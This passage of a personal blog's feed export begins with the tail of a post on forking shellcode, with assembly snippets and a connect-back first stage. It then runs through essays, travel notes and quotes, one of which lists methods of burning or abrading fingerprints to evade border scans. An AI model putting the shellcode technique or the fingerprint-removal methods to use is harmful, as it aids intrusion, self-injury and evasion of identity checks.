pi.hThread&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    pushl %esi&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    call RESUMETHREAD-getpcloc(%ebp)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;7a) If you are the forking process, exit the thread&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    xorl %eax,%eax&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    pushl %eax&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    call EXITTHREAD-getpcloc(%ebp)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;7b) If you are the forked process, sleep for a while to let the main thread initialize everything (the code passes 0x1000 milliseconds, roughly four seconds)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;kernel32.dll!Sleep(0x1000)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;All that takes around &lt;span style="font-weight: bold;"&gt;0x2cd bytes&lt;/span&gt; (it can be optimized), including:&lt;br /&gt;- LoadLibrary("WS2_32.dll")&lt;br /&gt;- resolving WS2_32.dll!WSAStartup and calling it&lt;br /&gt;- the first-stage MOSDEF shellcode (socket/connect/recv).&lt;br 
/&gt;&lt;br /&gt;&lt;br /&gt;All the kudos go to Bas and his recent rewrite of our shellcode framework, which made this a much smoother experience.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-7106902405834798336?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/7106902405834798336/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=7106902405834798336' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/7106902405834798336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/7106902405834798336'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/08/apology-of-forking-shellcode.html' title='Apology of forking shellcode'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-1581672517050143348</id><published>2008-06-30T16:12:00.000-07:00</published><updated>2008-07-01T17:07:42.716-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='reflexión'/><category scheme='http://www.blogger.com/atom/ns#' term='ricoeur'/><category scheme='http://www.blogger.com/atom/ns#' term='hiroshima'/><category scheme='http://www.blogger.com/atom/ns#' term='enola gay'/><title type='text'>Reflexión o Barbarie</title><content type='html'>Ricoeur wisely says:&lt;br /&gt;"War is and remains, in our eyes, that cataclysm, that irruption of chaos, that return to the struggle for life in the external relations between State and State. This historical unreason must remain unjustified and unjustifiable; the event that consecrates the complete separation of charity and violence, by breaking the fragile bond - the prohibition of homicide - that held them together, cannot be the object of a moral deduction."&lt;br /&gt;&lt;br /&gt;Paul Ricoeur, in History and Truth, speaks of two quite distinct ethics in man, analysed through Christianity.&lt;br /&gt;The first is Christian agape, that is, the ethic of love for one's neighbour, of "love one another", which is also the ethic of charity, of turning the other cheek. This ethic proposes a sacrificial form of love, since it offers no resistance to violence.&lt;br /&gt;The second ethic is made manifest by Saint Paul in chapter XIII of the Epistle to the Romans, when he introduces the figure of the magistrate: "Let every person be subject to the governing authorities. For there is no authority except from God, and those that exist have been instituted by God." Ricoeur says that here Paul breaks with the invitation to mutual love and draws this figure of authority, which &lt;span style="font-style: italic;"&gt;punishes&lt;/span&gt; the one who does wrong.&lt;br /&gt;There lies the rupture between the two ethics: that of sacrifice, which returns good for evil, and that of the coercive State, which returns evil for evil.&lt;br /&gt;But there is a single, indisputable limit between the two that can hold them together: the prohibition of homicide, "thou shalt not kill". That is the limit of the State: respect for the person, for their life and their dignity.&lt;br /&gt;&lt;br /&gt;A few days ago I had the chance to visit the Steven F. Udvar-Hazy Air and Space Museum, where the Enola Gay was on display, the infamous Boeing B-29 that in 1945 dropped the first atomic bomb, which exploded over the city of Hiroshima, Japan.&lt;br /&gt;When its fuselage was exhibited in a museum of similar character, many controversies arose, but unlike those that would have troubled any person of temperance, which would have been about an inner ethical conflict, the protests were directed at the fact that the exhibit emphasised the dreadful results of the atomic bomb rather than the motivations and the role the bomb played in ending the Second World War.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;Steven F. Udvar-Hazy Air and Space Museum&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_aUReV5sSeqk/SGmGMjtHpLI/AAAAAAAADBM/sXYU8xxbu8E/s1600-h/dsc01028.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_aUReV5sSeqk/SGmGMjtHpLI/AAAAAAAADBM/sXYU8xxbu8E/s400/dsc01028.jpg" alt="" id="BLOGGER_PHOTO_ID_5217849193586468018" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;Peace Museum (Hiroshima, JAPAN)&lt;/b&gt; &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_aUReV5sSeqk/SGmGM-xEWkI/AAAAAAAADBU/m0ol6vBlwTY/s1600-h/DSC_3648.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_aUReV5sSeqk/SGmGM-xEWkI/AAAAAAAADBU/m0ol6vBlwTY/s400/DSC_3648.JPG" alt="" id="BLOGGER_PHOTO_ID_5217849200850786882" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-1581672517050143348?l=eticanicomana.blogspot.com' alt='' 
/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/1581672517050143348/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=1581672517050143348' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1581672517050143348'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1581672517050143348'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/06/reflexin-o-barbarie.html' title='Reflexión o Barbarie'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_aUReV5sSeqk/SGmGMjtHpLI/AAAAAAAADBM/sXYU8xxbu8E/s72-c/dsc01028.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-4300086648306349605</id><published>2008-06-23T16:56:00.000-07:00</published><updated>2008-06-23T16:59:30.248-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sisifo argentino'/><title type='text'>¿Qué hacemos Juan Carlos?</title><content type='html'>&lt;div style="text-align: right;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_aUReV5sSeqk/SGA4jgafueI/AAAAAAAAC9A/D5Of1Rm6qH0/s1600-h/841976.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_aUReV5sSeqk/SGA4jgafueI/AAAAAAAAC9A/D5Of1Rm6qH0/s400/841976.JPG" alt="" 
id="BLOGGER_PHOTO_ID_5215230551142676962" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:78%;" &gt;&lt;span style="font-family:courier new;"&gt;Liniers - La Nacion, 18 June&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-4300086648306349605?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/4300086648306349605/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=4300086648306349605' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4300086648306349605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4300086648306349605'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/06/que-hacemos-juan-carlos.html' title='¿Qué hacemos Juan Carlos?'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_aUReV5sSeqk/SGA4jgafueI/AAAAAAAAC9A/D5Of1Rm6qH0/s72-c/841976.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-5621758861876721395</id><published>2008-06-03T16:32:00.000-07:00</published><updated>2008-06-03T16:40:41.303-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tokyo'/><category scheme='http://www.blogger.com/atom/ns#' 
term='bitacora'/><category scheme='http://www.blogger.com/atom/ns#' term='pelicula'/><category scheme='http://www.blogger.com/atom/ns#' term='dvd'/><title type='text'>Order your DVD now!</title><content type='html'>As I write these words, the iDVD on the mini mac is opening all its vast and tiny logic gates to render the cinematic version of the Japan logbooks.&lt;br /&gt;It is approximately 45 mysterious, exciting, gripping and challenging minutes of the video that we recorded almost in passing in those endearing, remote lands.&lt;br /&gt;&lt;br /&gt;  The chapters are divided into Shibuya (Tokyo), Shibuya Crossing, Akihabara, Takayama and Ryokan Asunaro. The more perceptive readers of the written chronicles will notice the absence of many other places, but the electronic eye of the mini-DV only switched on a handful of times.&lt;br /&gt;  But no need for alarm: the adventures are still there, as current as ever in the pages of this blog.&lt;br /&gt;&lt;br /&gt;Enjoy!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-5621758861876721395?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/5621758861876721395/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=5621758861876721395' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5621758861876721395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5621758861876721395'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/06/encargue-su-dvd-ya.html' title='Encargue su DVD ya!'/><author><name>Nico 
Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-7895793318833203639</id><published>2008-02-18T04:10:00.000-08:00</published><updated>2008-02-18T04:17:06.066-08:00</updated><title type='text'>A moment of lucidity</title><content type='html'>Those who can... step back from the monitor, straighten the corners of their mouth, and their gaze, like those forking paths of Borges, slowly loses itself in the finitude of the urban landscape. Reflection is imminent...&lt;br /&gt;&lt;br /&gt;Did you know that there are already generations over 18, born during the presidency of Carlos S. Menem?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-7895793318833203639?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/7895793318833203639/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=7895793318833203639' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/7895793318833203639'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/7895793318833203639'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/02/un-momento-de-lucidez.html' title='Un momento de lucidez'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-1756268278194158622</id><published>2008-01-12T13:46:00.000-08:00</published><updated>2008-01-12T13:57:48.404-08:00</updated><title type='text'>Antidepressants in the Epic</title><content type='html'>"&lt;span style="font-style: italic;"&gt;Then Helen, born of Zeus, thought of something else: at once she cast into the wine they were drinking a drug to dispel grief and soothe anger, which made one forget every ill. Whoever took it, once it had been mixed in the bowl, would shed no tear down his cheeks for a whole day, not even if his father and mother had died, or they slew before his eyes with bronze his brother or his son. Such ingenious drugs the daughter of Zeus had, and excellent ones, which Polydamna, wife of Thon, the Egyptian woman, had given her, whose fertile land produces a great many drugs, and once mixed many are good and many harmful; and there every man is a physician who excels above all other men, for he is of the stock of Paeon. So then, once she had cast in the drug, she ordered that wine be poured again;&lt;/span&gt; [...]"&lt;br /&gt;&lt;br /&gt;Odyssey, Homer. Book IV. 
Paragraph 219.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-1756268278194158622?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/1756268278194158622/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=1756268278194158622' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1756268278194158622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1756268278194158622'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/01/antidepresivos-en-la-epica.html' title='Antidepresivos en la Epica'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-1138379829537813841</id><published>2008-01-11T08:35:00.000-08:00</published><updated>2008-01-11T08:49:18.985-08:00</updated><title type='text'>From Homer, on wine</title><content type='html'>"Wine, sweet as honey, drives you mad; it harms whoever seizes it greedily and does not drink it in moderation"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-1138379829537813841?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/1138379829537813841/comments/default' 
title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=1138379829537813841' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1138379829537813841'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1138379829537813841'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/01/de-homero-sobre-el-vino.html' title='De Homero, sobre el vino'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-984481074294595366</id><published>2008-01-06T18:33:00.000-08:00</published><updated>2008-01-06T18:46:15.823-08:00</updated><title type='text'>Erasing One's Fingerprints</title><content type='html'>Among the PacSec presentations, the lightning talks stand out: 10 to 15 minute talks showing something very specific.&lt;br /&gt;One of the talks that drew the most attention was by the Canadian "mock", a regular on the organising staff, in which he used various masochistic techniques to erase his fingerprints.&lt;br /&gt;Among them he used:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Cyanoacrylate: also known as "la gotita"&lt;/li&gt;&lt;li&gt;A callus stone (and a lot of patience)&lt;/li&gt;&lt;li&gt;Using a dremel&lt;/li&gt;&lt;li&gt;Acid&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Burning himself: he used a steak griddle&lt;/li&gt;&lt;li&gt;Freezing with compressed propane&lt;/li&gt;&lt;/ul&gt; All this pain was in the context of a new change to Japan's customs controls, under which all 
foreigners have to leave their fingerprints and a photo in order to enter the country.&lt;br /&gt;He achieved his goal, getting in by simply filling out a form (after several failed attempts to scan the burns). The excuse used was a supposed skiing accident in which his fingers got stuck to a frozen piece of iron.&lt;br /&gt;From what he told me, he was neither the first nor the last to enter Japan without being scanned, since apparently the elderly tend to lose the pattern of their prints over time.&lt;br /&gt;&lt;br /&gt;For the morbid, &lt;a href="http://sketchfactory.com/static/yokosojapan.pdf"&gt;here&lt;/a&gt; you can find a PDF with the slides.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-984481074294595366?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/984481074294595366/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=984481074294595366' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/984481074294595366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/984481074294595366'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/01/borrarse-las-huellas-dactilares.html' title='Borrarse las Huellas Dactilares'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-4633284675528640922</id><published>2007-12-12T04:47:00.001-08:00</published><updated>2007-12-12T04:49:43.445-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sanfrecce'/><category scheme='http://www.blogger.com/atom/ns#' term='soccer'/><category scheme='http://www.blogger.com/atom/ns#' term='hiroshima'/><category scheme='http://www.blogger.com/atom/ns#' term='futbol'/><category scheme='http://www.blogger.com/atom/ns#' term='japan'/><title type='text'>Everyone with Sanfre!</title><content type='html'>&lt;object height="355" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/t4YzKl_iP_g&amp;amp;rel=1"&gt;&lt;param name="wmode" value="transparent"&gt;&lt;embed src="http://www.youtube.com/v/t4YzKl_iP_g&amp;amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" height="355" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;Sanfrecce F.C. 
live, in the streets of Hiroshima&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-4633284675528640922?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/4633284675528640922/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=4633284675528640922' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4633284675528640922'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4633284675528640922'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/12/todos-con-el-sanfre.html' title='Todos con el Sanfre !'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-3068163922619413632</id><published>2007-12-11T20:19:00.000-08:00</published><updated>2007-12-11T20:20:04.009-08:00</updated><title type='text'>Nipponese Chronicles - 12th Chapter "The Return"</title><content type='html'>Regrettably and fortunately, when one pokes around other cultures one cannot&lt;br /&gt;help falling into disruptive comparisons that unsettle one's&lt;br /&gt;own senses.&lt;br /&gt;&lt;br /&gt;We had the great opportunity to get to know a culture distant from&lt;br /&gt;us, both geographically and in knowledge and consideration,&lt;br /&gt;as Japan is.&lt;br /&gt;&lt;br /&gt;Without idealising or going 
into much depth, what stands out at first sight is&lt;br /&gt;a widespread internalisation of the norm, that is, the law: showing respect,&lt;br /&gt;keeping the city clean, not talking on mobile phones on&lt;br /&gt;trains and subways simply so as not to bother others.&lt;br /&gt;&lt;br /&gt;The enormous economic and technological development also stands out. And here comes a big&lt;br /&gt;question of comparison: Japan is a tiny country with 127 million&lt;br /&gt;inhabitants, around 337 and a half people per square kilometre versus the 14&lt;br /&gt;that we are. And with fewer "natural resources" at its disposal than we have.&lt;br /&gt; &lt;br /&gt; But what do resources consist of: the gifts granted by&lt;br /&gt;wise nature, or the capacity to reason in order to use them&lt;br /&gt;for one's own welfare and benefit?&lt;br /&gt;&lt;br /&gt; What good are enormous natural resources if the "other resources" do not exist or are&lt;br /&gt;in decline? The answer is obvious: the resources are&lt;br /&gt;in the mind, and that is intelligence.&lt;br /&gt; &lt;br /&gt;Hiroshima, roughly 50 years after a nuclear devastation, recovers and is&lt;br /&gt;today what it is; Argentina, 50 years on from the same date on&lt;br /&gt;which the bomb fell -a time when we were known as the breadbasket of the world-,&lt;br /&gt;finds itself in one of its worst moments in terms of poverty and violence indices.&lt;br /&gt;&lt;br /&gt; What happened to the abundance of resources? Ah, right, they were not enough on their own; it was not&lt;br /&gt;simply a matter of spontaneous generation?&lt;br /&gt;&lt;br /&gt;Something had to be done with them. Yes, something! Work. 
To programme for the long term, plan,&lt;br /&gt;meet objectives, impose a just law, educate, persevere and&lt;br /&gt;persevere again, achieve a sustainable and continuous base from which&lt;br /&gt;to take off.&lt;br /&gt;&lt;br /&gt;But we do nothing but tear down the foundations and float&lt;br /&gt;adrift, hoping that the wind alone will return us, after each&lt;br /&gt;storm, to a safe place. We know what happened and what is&lt;br /&gt;happening.&lt;br /&gt;&lt;br /&gt; In Argentina, by contrast, what you see at every moment, from the time you get off the plane&lt;br /&gt;and set foot on "solid" ground, is a constant transgression of the norm, and a permanent praise of that&lt;br /&gt;transgression.&lt;br /&gt;&lt;br /&gt;We are very clever and then we laugh slyly&lt;br /&gt;at others: the "ponja", the "chino", etc. &lt;br /&gt;&lt;br /&gt;And us? Where are we? Do we laugh at ourselves as slyly?&lt;br /&gt;&lt;br /&gt;The journalists covering the Boca match are amazed that in Japan you can see people in the street with&lt;br /&gt;two mobile phones. I care little whether it is 2 or 3; the reality is that whoever has 2 mobile phones can afford it, and whoever can afford it does not stop eating, and&lt;br /&gt;consumes.&lt;br /&gt;Technology is not only in electronic gadgets for individual consumption but takes shape in a&lt;br /&gt;social good such as public transport. &lt;br /&gt;As I was saying, I care little whether they use technology to excess, because they have it; we do not have it,&lt;br /&gt;we do not value it, we do not develop it, we cannot talk.   
The excess is&lt;br /&gt;a separate and important problem, but the shortage is more serious: of&lt;br /&gt;social resources, not of brilliant individuals.&lt;br /&gt;&lt;br /&gt;Cristina, the industrial model was perhaps valid in '45; now a greater scientific, technological and cultural investment is required.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;See you soon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-3068163922619413632?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/3068163922619413632/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=3068163922619413632' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3068163922619413632'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3068163922619413632'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/12/cronicas-nipponas-12vo-capitulo-el.html' title='Cronicas Nipponas - 12vo Capitulo &quot;El regreso&quot;'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2053053390958921123</id><published>2007-12-11T09:10:00.001-08:00</published><updated>2007-12-11T09:14:48.545-08:00</updated><title type='text'>One more from the conference...</title><content type='html'>This is a panoramic photo of the conference during my talk.&lt;br /&gt;&lt;br 
/&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_aUReV5sSeqk/R17E0m0DAaI/AAAAAAAACqo/3RLbFGsbUA8/s1600-h/2094364077_7acc9f0d1c_b.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_aUReV5sSeqk/R17E0m0DAaI/AAAAAAAACqo/3RLbFGsbUA8/s320/2094364077_7acc9f0d1c_b.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5142764232554774946" /&gt;&lt;/a&gt;&lt;br /&gt;The wide-angle distortion at the edges gives the impression that it was a small room, but it must easily have been around 50 metres wide and half that long.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Kudos to &lt;a href="http://www.flickr.com/photos/hirosan"&gt;Hirosan&lt;/a&gt; for the photo.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-2053053390958921123?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2053053390958921123/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2053053390958921123' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2053053390958921123'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2053053390958921123'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/12/otra-mas-de-la-conferencia.html' title='Otra mas de la conferencia...'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
